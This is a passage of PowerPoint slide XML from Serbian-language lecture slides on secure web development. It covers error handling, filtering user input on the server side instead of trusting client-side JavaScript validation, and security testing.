              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="1" dirty="0"/>
              <a:t>backup </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>podataka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>već</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>brinuti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>samostalno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> o tome. </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="sr-Latn-R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01BC8-2712-4162-86C4-931BCFD3C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r-Latn-RS" sz="2800" dirty="0" err="1"/>
              <a:t>Upravljanje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="sr-Latn-RS" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="sr-Latn-RS" sz="2800" dirty="0" err="1"/>
              <a:t>greškama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DF3CA-A31F-4BEC-B1C1-91C13EFAF8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371600"/>
            <a:ext cx="7194550" cy="4770438"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>Projektovanje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>sistema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> za </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>upravljanje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>greškama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> 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uzeti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>obzir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>najranijoj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>fazi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>izgradnje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>aplikacije</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>prilikom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>razvoja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>oslanjati</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> se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taj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>Dobar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> za </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>upravljanje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>greškama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>treba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>sadrži</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>obavještenje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> za </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>korisnike</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>nastaloj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>grešci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>koja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> ne </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>sadrži</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>nikakve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>tehničke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>detalje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>toj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>grešci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>obavještenje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> za </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>programere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>koje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>sadrži</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>što</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>više</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>tehničkih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>detalja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>koji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>otkrivaju</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>uzrok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>greške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mjesto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>nastanka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>Svakako</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>,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uzeti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>obzir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alate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>koji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>služe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> za </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>pronalaženje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>grešaka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="0" dirty="0"/>
          </a:p>
          <a:p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524210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05693-9D31-4840-862D-7C7E0FCC3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Filtriranje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>ulaza</a:t>
            </a:r>
            <a:endParaRPr lang="sr-Latn-M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A285CB-27F6-4307-B7E9-4D58412BF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39687"/>
            <a:ext cx="7194550" cy="5002351"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>Sledeći</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>važnan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>faktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>filtriranje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ulaza</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>inputa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> to je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>najvredniji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> sav1jet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>koga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> se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pridržavati</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>Uvijek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>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razmišljati</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>kritičnom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>stavu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>osmisliti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>najgori</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> scenario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spriječiti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ga.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>Korisniku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>nikada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> ne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vjerovati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to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>uvijek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>treba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>imati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umu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>Filtrirati</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>svaki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ulaz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>provjeravati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najmanje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>moguće</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>greške</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>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što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dužina</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>stringa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slične</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>,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nikada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> se ne </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>uzdati</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>mogućnost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> HTML-a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JavaScripta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> za </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>validaciju</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>inputa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>Koliko god dobro </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>zaštitili</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>našu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>formu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>funkcijama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, one </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>uvijek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" u="sng" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mogu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" u="sng" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>biti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" u="sng" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>zaobiđene</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>,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sve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>što</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>izvršava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klijentskoj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>strani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>.</a:t>
            </a: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1577158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D07D8-AA3C-4D65-9776-3D69EBF20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err="1"/>
              <a:t>Testiranje</a:t>
            </a:r>
            <a:endParaRPr lang="sr-Latn-ME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50CB6-2BA2-4EFC-99B7-163925E587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143000"/>
            <a:ext cx="7194550" cy="4999038"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>Bezbijednost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>može</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>najlakše</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>podići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viši</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>nivo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>prostim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>testiranjem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>Jednostavno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>razmišljajte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>kao</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>napadač</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>uzmite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>obzir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>sve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
